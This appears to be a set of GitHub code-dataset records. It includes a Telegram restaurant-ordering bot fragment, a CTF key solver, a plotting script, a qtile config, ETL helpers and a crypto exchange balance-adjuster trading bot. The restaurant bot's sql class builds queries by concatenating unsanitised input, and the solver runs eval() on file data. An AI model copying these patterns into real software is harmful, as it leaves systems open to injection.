shipping_options.append(shipping_option)\n\n shipping_option = telebot.types.ShippingOption('sam', 'Самовывоз')\n shipping_option.add_price(telebot.types.LabeledPrice('Самовывоз', 0))\n shipping_options.append(shipping_option)\n\n bot.answer_shipping_query(shipping_query_id=shipping_query.id, ok=True, shipping_options=shipping_options,\n error_message=config.error_answer_query)\n\n\n@bot.pre_checkout_query_handler(func=lambda query: True)\ndef checkout(pre_checkout_query):\n bot.answer_pre_checkout_query(pre_checkout_query_id=pre_checkout_query.id,\n ok=True,\n error_message=config.error_pre_checkout)\n\n\n@bot.message_handler(content_types=['successful_payment'])\ndef got_payment(message):\n print('Пользователь', message.from_user.id, 'оформил заказ')\n for item in utils.get_basket(str(message.from_user.id)):\n utils.del_from_basket(str(message.from_user.id), item)\n bot.send_message(chat_id=message.chat.id,\n text=config.successful_payment.format(message.successful_payment.total_amount / 100,\n message.successful_payment.currency),\n parse_mode='Markdown', reply_markup=main_menu_keyboard)\n\nif __name__ == '__main__':\n\n main_menu_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=2)\n buttons = (telebot.types.KeyboardButton(text=button_text) for button_text in config.main_menu_keyboard)\n main_menu_keyboard.add(*buttons)\n\n back_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n back_keyboard.add(telebot.types.KeyboardButton(text=config.back_button))\n\n def amount_keyboard(user_id, item, basket=False):\n if basket:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='b<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='b->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.del_from_basket,\n callback_data='remove_' + item))\n elif utils.item_amount(user_id, item):\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.to_basket, callback_data='to_basket'))\n else:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n\n return amount\n\n ### ЗДЕСЬ НУЖНА ВЫГРУЗКА РАЗДЕЛОВ ИЗ БД\n menu_keyboard = telebot.types.InlineKeyboardMarkup(row_width=2)\n sorted_sections_list = list(config.menu_keyboard)\n sorted_sections_list.sort()\n buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_' + str(i))\n for i, button_text in enumerate(sorted_sections_list))\n menu_keyboard.add(*buttons)\n ###\n\n pay_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_keyboard.add(telebot.types.KeyboardButton(text=config.pay_button),\n telebot.types.KeyboardButton(text=config.back_button))\n\n hidden_keyboard = telebot.types.ReplyKeyboardRemove()\n\n\nclass sql:\n def tovars(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n company = \"KFC\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM '\"\"\" + str(company) + \"' ORDER BY Блюдо\")\n\n tovars = cursor.fetchall()\n conn.close()\n return tovars\n\n def kitchen(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n cursor.execute(\"\"\"\n SELECT Название\n FROM Кухня\n ORDER BY Название;\n \"\"\")\n kitchen = cursor.fetchall()\n conn.close()\n return kitchen\n def bludo_po_kuhne(self, kitchen_vibor):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n self.kitchen_vibor = \"Фастфуд\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM KFC\n WHERE Кухня = '\"\"\" + str(kitchen_vibor) + \"'\")\n kitchen_price = cursor.fetchall()\n conn.close()\n return kitchen_price\n def bludo_info(self, bludo):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n # Вывод всей информации о блюде\n self.bludo = \"Биггер\"\n cursor.execute(\"\"\"\n SELECT *\n FROM KFC\n WHERE Блюдо = '\"\"\" + str(bludo) + \"'\")\n info_food = cursor.fetchall()\n conn.close()\n return info_food\n\n\n\n\n bot.polling(none_stop=True)\n\n\n","repo_name":"eskidnov/restaurant_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15636,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26234542611","text":"#!/usr/bin/env python3.4\n\nimport re\n\nwith open('data','rt') as f:\n\tdata = f.read().strip().split('\\n')\ncount = {}\nfor d in data:\n\tcount[d] = d.count('a')\ncount_s = sorted(count.items(), key=lambda x:x[1])\n\nkey = [0]*47\ni = 0\nequ=list(map(lambda x:x[0],count_s))\nfor a in range(len(equ)):\n\tfor c in range(33,127):\n\t\tp = re.sub('a\\[\\d+\\]',str(c),equ[a])\n\t\tif eval(p):\n\t\t\tkey[i] = c\n\t\t\tequ = list(map(lambda x:x.replace('a[%d]'%i,str(key[i])),equ))\n\t\t\ti += 1\n\t\t\tbreak\nfkey = ''\nfor c in key:\n\tfkey += chr(c)\nprint(fkey)\n","repo_name":"qq53/ctf","sub_path":"simplexue/flag/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4575254323","text":"import sys\nimport csv\nimport matplotlib.pyplot as plt\nfrom datetime import *\nfrom ggplot import *\nimport matplotlib.dates as dt\n\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\n\nNYPD = {}\nd = {}\nTLC = {}\nDPR = {}\ncount = 0\nnext(reader)\nfor i in reader:\n\tcount = d.setdefault(i[3], 0)\n\td[i[3]] = count + 1\n\ntopk = sorted(d.items(), key = lambda x:x[1], reverse = True)\nk = int(sys.argv[2])\ntopk = [x for x,y in topk]\ntopk = topk[:k] \nstart_date = datetime.strptime('06/01/2013 00:00:00 AM', '%m/%d/%Y %H:%M:%S %p')\nf.close()\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\nnext(reader)\ncomplete = {}\nfor i in topk:\n\tcomplete[i] = {}\nfor i in reader:\n\tif i[3] in topk:\n\t\tdate = datetime.strptime(i[1],'%m/%d/%Y %H:%M:%S %p')\n\t\tdelta = date - start_date\n\t\tif int(delta.days) > 90:\n\t\t\tcontinue\n\t\tcount = complete[i[3]].setdefault(int(delta.days), 0)\n\t\tcomplete[i[3]][int(delta.days)] = count + 1\nlabels = complete.keys()\nXY = complete.values()\n\nfig,ax = plt.subplots()\nL = []\nfor i in xrange(0,91):\n\tL.append(start_date + timedelta(days = i))\ncolors = ['b','g','r','c','m','y','k']\nc = 0\nfor i in labels:\n\tc += 1\n\tL = []\n\tX = complete[i].keys()\n\tY = complete[i].values()\n\tfor j in xrange(0,len(X)):\n\t\tL.append(start_date + timedelta(days = j))\n\n\tplt.xticks(X, L, fontsize = 6)\n\tplt.plot(L, Y, colors[c%7], label = i)\n\nplt.legend(loc = 2)\nax.xaxis.set_major_formatter(dt.DateFormatter(\"%b %d %Y\"))\nax.xaxis.set_major_locator(dt.DayLocator((1,8,16,24)))\n\nplt.xlabel('Date')\nplt.ylabel('Number of Complaints')\nplt.show()\n\n\n","repo_name":"rybo449/Matplotlib-Visualizations","sub_path":"problem2_2.py","file_name":"problem2_2.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8589869406","text":"from libqtile.config import Match\nfrom libqtile.layout.columns import Columns\nfrom libqtile.layout.floating import Floating\nfrom libqtile.layout.max import Max\nfrom libqtile.layout.xmonad import MonadWide\n\nfrom colors import OneDark as c\n\n_layout_theme = {\n \"border_width\": 4,\n \"margin\": 8,\n \"border_focus\": c.base0F,\n \"border_normal\": c.base00,\n}\nlayouts = [\n Columns(name=\"cols\", num_columns=3, **_layout_theme),\n Max(),\n # Try more layouts by unleashing below layouts.\n # Stack(num_stacks=2),\n # Bsp(),\n # Matrix(),\n # MonadTall(),\n MonadWide(name=\"wide\", **_layout_theme),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\nfloating_layout = Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\n","repo_name":"jamestrew/dotfiles","sub_path":"qtile/.config/qtile/_layouts.py","file_name":"_layouts.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40344168081","text":"\"\"\"\nThis file contains helper methods used throughout the phases of the ETL pipeline\n\"\"\"\n\nfrom datetime import datetime\nimport pandas as pd\nfrom constants import dataframe\n\ndef create_df(columns):\n \"\"\"\n Create a template dataframe based on columns provided\n\n Input : dictioary - { column name : column data type }\n Output : dataframe \n \"\"\"\n data_frame = pd.DataFrame(columns)\n return data_frame\n\ndef create_template_restaurants_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurants data\n (used for Q1 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.COUNTRY: pd.Series(dtype='str'),\n dataframe.CITY: pd.Series(dtype='str'),\n dataframe.USER_RATING_VOTES: pd.Series(dtype='str'),\n dataframe.USER_AGGREGATE_RATING: pd.Series(dtype='str'),\n dataframe.CUISINES: pd.Series(dtype='str'),\n dataframe.COUNTRY_ID: pd.Series(dtype='int'),\n dataframe.RATING_TEXT: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENTS: pd.Series(dtype='object'),\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str')\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef create_template_events_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurant events data\n in Apr 2019 (used for Q2 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str'),\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef map_country_code_to_country_name(d_countries, country_code):\n \"\"\"\n Returns the country name associated with the provided country code\n based on the countries dictionary of { country code : country name }\n If country code does not exist, return NA\n\n Input : dictionary, string\n Output : string \n \"\"\"\n if country_code in d_countries:\n return d_countries[country_code]\n return dataframe.NA_VALUE\n\ndef event_occurs_within_dates(\n event_start,\n event_end,\n fixed_start,\n fixed_end\n):\n \"\"\"\n Check whether an event occurs within a date range \n\n Input : string, string, string, string\n Output : boolean \n \"\"\"\n return (\n event_start >= datetime.strptime(fixed_start, '%Y-%m-%d')\n and event_end <= datetime.strptime(fixed_end, '%Y-%m-%d')\n )\n\n\ndef replace_na_cells(data_frame, replacement_str):\n \"\"\"\n Replace NaN cells in the dataframe with a provided\n replacement string\n\n Input : dataframe, string \n Output : dataframe \n \"\"\"\n data_frame = data_frame.fillna(replacement_str)\n return data_frame\n\ndef extract_photo_urls(event):\n \"\"\"\n Obtain photo URLs for all photos of each event.\n If there's multiple photo URLs, they are separated by\n a comma delimiter\n\n Input : list\n Output : string\n \"\"\"\n if 'photos' in event:\n photo_urls = list(map(lambda photo: photo['photo']['url'], event['photos']))\n photo_urls_string = \",\".join(photo_urls)\n return photo_urls_string\n return dataframe.NA_VALUE\n","repo_name":"ongyongen/de","sub_path":"etl_pipeline/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17917237372","text":"import sys\nimport ccxt\nimport time\nimport signal\nimport re\nimport os\nimport uuid\nimport logging\nfrom threading import Thread, Lock\nimport argparse\nsignal.signal(signal.SIGINT, lambda x,y: os._exit(0))\nfrom flask_socketio import SocketIO, emit\nfrom datetime import datetime\nfrom decimal import Decimal\ndir_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = dir_path+'/../libs'\nsys.path.append(lib_path)\nfrom exchange_lib import *\nfrom common import log, socket_emit\n\n\ndef arg_parser(web_inputs=None):\n args_dict = web_inputs\n if not web_inputs:\n parser = argparse.ArgumentParser(description='Nico bot')\n parser.add_argument('ex_and_coin', type=str, help='Exchanges and coins')\n parser.add_argument('fees', type=str, help='Order fees for the coin and target coin')\n parser.add_argument('target_coin', type=str, help='Target coin')\n parser.add_argument('buyback_exchange', type=str, help='Buyback exchange')\n parser.add_argument('-s', '--threshold', type=str, default='0', help='threshold to adjust (default 0)')\n parser.add_argument('-i', '--interval', type=str, default='1', help='Checking interval in minute (default 1m)')\n parser.add_argument('-b', '--buyback', type=bool, nargs='?', const=True, default=False, help='Buyback')\n args = parser.parse_args()\n args_dict = vars(args)\n # end if\n\n ex_and_coin_list = args_dict.get('ex_and_coin')\n fees = args_dict.get('fees')\n ex_and_coin_fee_dict = {}\n kra_coins = []\n bin_coins = []\n \n for coin, fee in zip(ex_and_coin_list.split('-'), fees.split('-')):\n fee = Decimal(fee)\n ex_id = coin[:3]\n coin_fee_list = ex_and_coin_fee_dict.get(ex_id)\n if not coin_fee_list:\n coin_fee_list = []\n coin_fee_list.append((coin[3:], fee))\n ex_and_coin_fee_dict.update({ex_id: coin_fee_list})\n\n target_coin = args_dict.get('target_coin')\n buyback_exchange = args_dict.get('buyback_exchange')\n checking_interval = float(args_dict.get('interval'))\n threshold = Decimal(args_dict.get('threshold'))\n buyback = args_dict.get('buyback')\n if buyback == 'False':\n buyback = False\n elif buyback == 'True':\n buyback = True\n\n return {\n 'ex_and_coin_fee': ex_and_coin_fee_dict,\n 'checking_interval': checking_interval,\n 'target_coin': target_coin,\n 'buyback_exchange': buyback_exchange,\n 'threshold': threshold,\n 'buyback': buyback,\n 'account_sell_buy': args_dict['account_sell_buy'],\n 'account_buy_sell': args_dict['account_buy_sell'],\n 'own_username': args_dict['own_username']\n }\n\n\nclass balance_adjuster_bot():\n def __init__(self):\n self._exchanges = {}\n self._adjuster_coins = {}\n self._adjuster_coins_in_total = {}\n self._target_coin = ''\n self._buyback_exchange = ''\n self._threshold = 0\n self._buyback = True\n self._args = None\n self._terminate = False\n self._socketio = None\n self._channel_uuid = ''\n self._socketdata = {}\n self._logger = logging.getLogger('BalanceAdjusterBot')\n\n def terminate(self):\n self._terminate = True\n\n def _config_logger(self):\n self._logger.setLevel(logging.DEBUG)\n script_path = os.path.dirname(os.path.realpath(__file__))\n file_name = 'balance_adjuster_cmd_' + datetime.now().strftime('%Y-%m-%dT%H-%M-%S')\n if self._socketio:\n file_name = 'balance_adjuster_web_' + self._channel_uuid\n # create file handler which logs even debug messages\n fh = logging.FileHandler(script_path + '/../web/logs/'+ str(file_name) + '.log')\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n self._logger.addHandler(fh)\n\n def _log(self, data='', severity='info'):\n log(data, self._logger, self._socketio, self._channel_uuid, log_severity=severity)\n\n def _get_target_coin_amount_from_coin(self, coin_fee_pair):\n # Check if this coin is direct coin to target coin\n target_coin_amount = Decimal(0)\n buyback_order_amount = Decimal(0)\n order_info = ()\n if coin_fee_pair[-1] != None:\n coin, fee, pair = coin_fee_pair\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n pair = pair[3:]\n buyback_order_side = ''\n buyback_order_amount = Decimal(0)\n coin_position_in_pair = 1 if pair.find(coin) == 0 else 2\n order_book = self._exchanges.get(exchange_id).fetch_order_book(pair, 1)\n pair_price = 0\n coin_amount = self._adjuster_coins_in_total[coin_fee_pair][2]\n # Return None if price isn't initiated yet\n if order_book == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount * pair_price * (1 + fee/100)\n elif coin_amount > 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount * pair_price * (1 - fee/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount / pair_price * (1 + fee/100)\n buyback_order_amount = abs(target_coin_amount)\n elif coin_amount > 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount / pair_price * (1 - fee/100)\n buyback_order_amount = target_coin_amount\n order_info = (pair, buyback_order_side, buyback_order_amount, pair_price)\n # TODO will adapt later to new requirement. Indirect coin, hava intermediate coin\n else:\n coin, fees, _ = coin_fee_pair\n pair1, fee1 = fees[0]\n buyback_order_side1 = ''\n buyback_order_amount1 = Decimal(0)\n coin_position_in_pair = 1 if pair1.find(coin) == 0 else 2\n order_book1 = self._exchanges.get(exchange).fetch_order_book(pair1, 1)\n pair1_price = Decimal(0)\n coin_amount = self._adjuster_coins[exchange][coin_fee_pair][2]\n intermediate_coin_amount = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book1 == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount1 = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 + fee1/100)\n elif coin_amount > 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 - fee1/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n intermediate_coin_amount = coin_amount / pair1_price * (1 + fee1/100)\n buyback_order_amount1 = abs(intermediate_coin_amount)\n elif coin_amount > 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount / pair1_price * (1 - fee1/100)\n buyback_order_amount1 = intermediate_coin_amount\n\n pair2, fee2 = fees[1]\n buyback_order_side2 = ''\n buyback_order_amount2 = Decimal(0)\n target_coin_position_in_pair = 1 if pair2.find(self._target_coin) == 0 else 2\n order_book2 = self._exchanges.get(exchange).fetch_order_book(pair2, 1)\n pair2_price = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book2 == (None, None):\n return False, Decimal(0), ()\n\n if target_coin_position_in_pair == 1:\n if intermediate_coin_amount < 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 + fee2/100)\n buyback_order_amount2 = abs(target_coin_amount)\n elif intermediate_coin_amount > 0:\n pair2_price = Decimal(str(order_book2[1][0]))\n buyback_order_side2 = 'buy'\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 - fee2/100)\n buyback_order_amount2 = target_coin_amount\n elif target_coin_position_in_pair == 2:\n buyback_order_amount2 = abs(intermediate_coin_amount)\n if intermediate_coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair2_price = Decimal(str(order_book2[1][0]))\n target_coin_amount = intermediate_coin_amount * pair2_price * (1 + fee2/100)\n elif intermediate_coin_amount > 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount * pair2_price * (1 - fee2/100)\n order_info = ((pair1, buyback_order_side1, buyback_order_amount1, pair1_price), (pair2, buyback_order_side2, buyback_order_amount2, pair2_price))\n return True, target_coin_amount, order_info\n\n \"\"\"\n Check for all coin adjuster if they can be buyback and still have profit \n \"\"\"\n def _adjuster_check(self):\n accumulate_amount_of_target_coin = Decimal(0)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] != self._target_coin:\n status, target_coin_buyback_amount, buyback_order_input = self._get_target_coin_amount_from_coin(coin_fee_pair)\n #self._log('{} {} {}'.format(coin_fee_pair[0], target_coin_buyback_amount, buyback_order_input))\n if not status:\n self._log('balance_adjuster_botmom---235Not status {}'.format(coin_fee_pair[0]), severity='error')\n return False\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n self._adjuster_coins_in_total[coin_fee_pair][-1] = buyback_order_input\n accumulate_amount_of_target_coin += target_coin_buyback_amount\n else:\n accumulate_amount_of_target_coin += value[2]\n self._socketdata.update({'TOTAL_MARGIN': float(accumulate_amount_of_target_coin)})\n log('Total margin in target coin: {}'.format(float(accumulate_amount_of_target_coin)), console=False)\n if accumulate_amount_of_target_coin > self._threshold:\n return True\n return False\n\n def _cancel_opening_orders_then_buyback(self):\n coin_list = [k[0] for k in self._adjuster_coins_in_total.keys()]\n for ex_obj in self._exchanges.values():\n ex_obj.cancel_all_open_orders(coin_list)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] == self._target_coin:\n continue\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n if value[-2] != 0:\n # Direct pair\n if coin_fee_pair[-1]:\n pair, side, amount, price = value[-1]\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n # TODO later Indirect pair, must have intermediate\n else:\n for order_info in coin_fee_pair[-1]:\n pair, side, amount, price = order_info\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n\n\n def _balances_snapshot(self, at):\n if at == 'start': \n position = 0\n elif at == 'end':\n position = 1\n\n # Reset total counter before update\n for _, couters in self._adjuster_coins_in_total.items():\n couters[position] = 0\n\n for ex, coin_info in self._adjuster_coins.items():\n cur_balances = self._exchanges.get(ex).fetch_balance()\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n #self._log('coin_info {}'.format(coin_info))\n for coin, _ in coin_info.items():\n if not cur_balances:\n continue\n if not cur_balances.get(coin):\n continue\n cur_balance = Decimal(str(cur_balances.get(coin).get('total')))\n self._adjuster_coins[ex][coin][position] = cur_balance\n if at == 'end':\n start_balance = self._adjuster_coins[ex][coin][0]\n self._adjuster_coins[ex][coin][2] = cur_balance - start_balance\n\n coin_fee_pair = ()\n for item in self._adjuster_coins_in_total.keys():\n if coin == item[0]:\n coin_fee_pair = item\n break\n\n exist_amount = self._adjuster_coins_in_total.get(coin_fee_pair)[position]\n new_amount = exist_amount + cur_balance\n self._adjuster_coins_in_total[coin_fee_pair][position] = new_amount\n if at == 'end':\n for coin_fee_pair in self._adjuster_coins_in_total.keys():\n start_total_balance = self._adjuster_coins_in_total[coin_fee_pair][0]\n cur_total_balance = self._adjuster_coins_in_total[coin_fee_pair][1]\n self._adjuster_coins_in_total[coin_fee_pair][2] = cur_total_balance - start_total_balance\n\n self._socketdata = {}\n adjuster_coins_data = self._adjuster_coins.copy()\n for ex, coin_info in adjuster_coins_data.items():\n coin_dict = {}\n for coin, values in coin_info.items():\n coin_dict.update({coin: [float(e) if isinstance(e, Decimal) else e for e in values]})\n self._socketdata.update({ex: coin_dict})\n self._socketdata.update({'TOTAL': []})\n self._socketdata.update({'TOTAL_MARGIN': 0})\n\n print_out = 'EXCHAGES INFO\\n'\n for ex, coin_info_list in self._adjuster_coins.items():\n print_out += '{}\\n'.format(ex)\n for k, v in coin_info_list.items():\n print_out += '\\t{}\\t{}\\n'.format(k, [float(e) if isinstance(e, Decimal) else e for e in v])\n log(print_out, console=False)\n print_out = '\\nTOTAL INFO\\n'\n for k, v in self._adjuster_coins_in_total.items():\n value = [float(e) if isinstance(e, Decimal) else e for e in v[:-1]]\n self._socketdata['TOTAL'].append({k[0]: value})\n print_out += '\\t{}\\t{}\\n'.format(k[0], value)\n log(\"{}+++++++Balance checking at {} interval++++++++++\".format(print_out, at), console=False)\n\n\n def _find_pair_in_exchange(self, coin1, coin2):\n pair = None\n # Exception case for 'USD' on KRA\n if coin1 == 'USD' or coin2 == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = self._buyback_exchange\n market_pairs = [i.get('symbol') for i in self._exchanges.get(exchange_id).api.fetch_markets()]\n pair1 = \"{}/{}\".format(coin1, coin2)\n pair2 = \"{}/{}\".format(coin2, coin1)\n if pair1 in market_pairs:\n pair = pair1\n elif pair2 in market_pairs:\n pair = pair2\n # ee.g. KRAUSDT/USD or BINBTC/USDT\n return exchange_id + pair\n\n def bot_entry(self, web_inputs=None):\n socketio = None\n channel_uuid = ''\n if web_inputs:\n self._socketio = web_inputs.get('socketio')\n socketio = self._socketio\n self._channel_uuid = web_inputs.get('uuid')\n channel_uuid = self._channel_uuid\n self._logger = logging.getLogger(channel_uuid)\n\n self._args = arg_parser(web_inputs)\n self._target_coin = self._args.get('target_coin')\n self._buyback_exchange = self._args.get('buyback_exchange')\n self._buyback = self._args.get('buyback')\n self._threshold = self._args.get('threshold')\n checking_interval = self._args.get('checking_interval')\n ex_and_coin_fee_dict = self._args.get('ex_and_coin_fee')\n\n # Config logger\n self._config_logger()\n\n self._log('START THE BALANCE_ADJUSTER_BOT, INITIALIZING...')\n timer_thread = None\n for exchange_id in ex_and_coin_fee_dict:\n api_file_no = 0\n ex_id = exchange_id\n api_name = ''\n if re.match(r\"^.*\\d$\", ex_id):\n api_file_no = ex_id[-1]\n if ex_id[:-1] == 'BI':\n ex_id = 'BIN'\n elif ex_id[:-1] == 'KR':\n ex_id = 'KRA'\n if '1' == str(api_file_no):\n api_name = self._args.get('account_sell_buy')\n elif '2' == str(api_file_no):\n api_name = self._args.get('account_buy_sell')\n\n exchange_obj = exchange(ex_id, api_name=api_name, own_username=self._args.get('own_username'), api_from_file=api_file_no)\n self._exchanges.update({exchange_id: exchange_obj})\n\n # Initial adjuster list of coins, each item has format: exchang_id: {coin: [start, end, adjuster_amount]}\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n for ex, coin_fee_list in ex_and_coin_fee_dict.items():\n self._adjuster_coins.update({ex: {}})\n for coin, fee in coin_fee_list:\n if coin == self._target_coin:\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n self._adjuster_coins_in_total.update({(coin, fee, None): [Decimal(0), Decimal(0), Decimal(0), ()]})\n continue\n pair = self._find_pair_in_exchange(self._target_coin, coin)\n if pair:\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n self._exchanges.get(exchange_id).register_order_book(pair[3:])\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n if coin not in [i[0] for i in self._adjuster_coins_in_total.keys()]:\n self._adjuster_coins_in_total.update({(coin, fee, pair): [Decimal(0), Decimal(0), Decimal(0), ()]})\n else:\n # TODO later. There is no direct pair for the coin and target coin, it must have intermediate coin\n info = coin[1][1:-1].split('+')\n intermediate_coin = info[0]\n pair1 = self._find_pair_in_exchange(intermediate_coin, coin[0])\n pair2 = self._find_pair_in_exchange(intermediate_coin, self._target_coin)\n if not pair1 or not pair2:\n self._log(\"balance_adjuster_botmom---420Couldn't find pair for {} {} {}\".format(intermediate_coin, coin[0], self._target_coin), severity='error')\n self._exchanges.get(ex).register_order_book(pair1)\n self._exchanges.get(ex).register_order_book(pair2)\n fees = ((pair1, info[1]), (pair2, info[2]))\n self._adjuster_coins[ex].update({(coin[0], fees, None): [Decimal(0), Decimal(0), Decimal(0)]})\n\n # Take START balances snapshot\n self._balances_snapshot(at='start')\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n while not self._terminate:\n time.sleep(checking_interval * 60)\n # Take END balances snapshot\n self._balances_snapshot(at='end')\n check_flag = self._adjuster_check()\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n if check_flag and self._buyback:\n self._log('balance_adjuster_botmom---436**************SIGNAL, ADJUSTING BALANCE ...')\n self._cancel_opening_orders_then_buyback()\n log(\"-------------------------------------------------------------------------------------------------------------\", console=False)\n\n # end while\n if timer_thread:\n timer_thread.join()\n self._log(\"balance_adjuster_botmom---443BALANCE_ADJUSTER_BOT EXIT!\")\n # end bot_entry mothod\n# end balance_adjuster_bot class\n\n\nif __name__ == \"__main__\":\n a_bot = balance_adjuster_bot()\n a_bot.bot_entry()\n 